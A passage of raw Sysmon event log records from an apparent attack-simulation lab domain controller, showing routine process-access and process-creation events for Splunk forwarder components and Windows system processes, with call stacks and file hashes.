Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005096Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:44.691{59A5CD1D-9090-6005-1C01-00000000A301}4160C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005122Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:45.534{59A5CD1D-9091-6005-1D01-00000000A301}30884732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005121Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:45.393{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9091-6005-1D01-00000000A301}3088C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005120Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:45.393{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005119Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:45.393{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005118Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:45.393{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005117Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:45.393{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005116Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:45.393{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005115Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:45.393{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005114Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:45.393{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005113Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:45.393{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005112Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:45.393{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005111Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:45.393{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9091-6005-1D01-00000000A301}3088C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005110Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:45.393{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9091-6005-1D01-00000000A301}3088C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005109Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:45.394{59A5CD1D-9091-6005-1D01-00000000A301}3088C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005135Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:46.065{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9092-6005-1E01-00000000A301}4656C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005134Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:46.065{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005133Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:46.065{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005132Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:46.065{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005131Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:46.065{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005130Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:46.065{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005129Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:46.065{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005128Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:46.065{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005127Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:46.065{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005126Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:46.065{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005125Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:46.065{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9092-6005-1E01-00000000A301}4656C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005124Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:46.065{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9092-6005-1E01-00000000A301}4656C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program 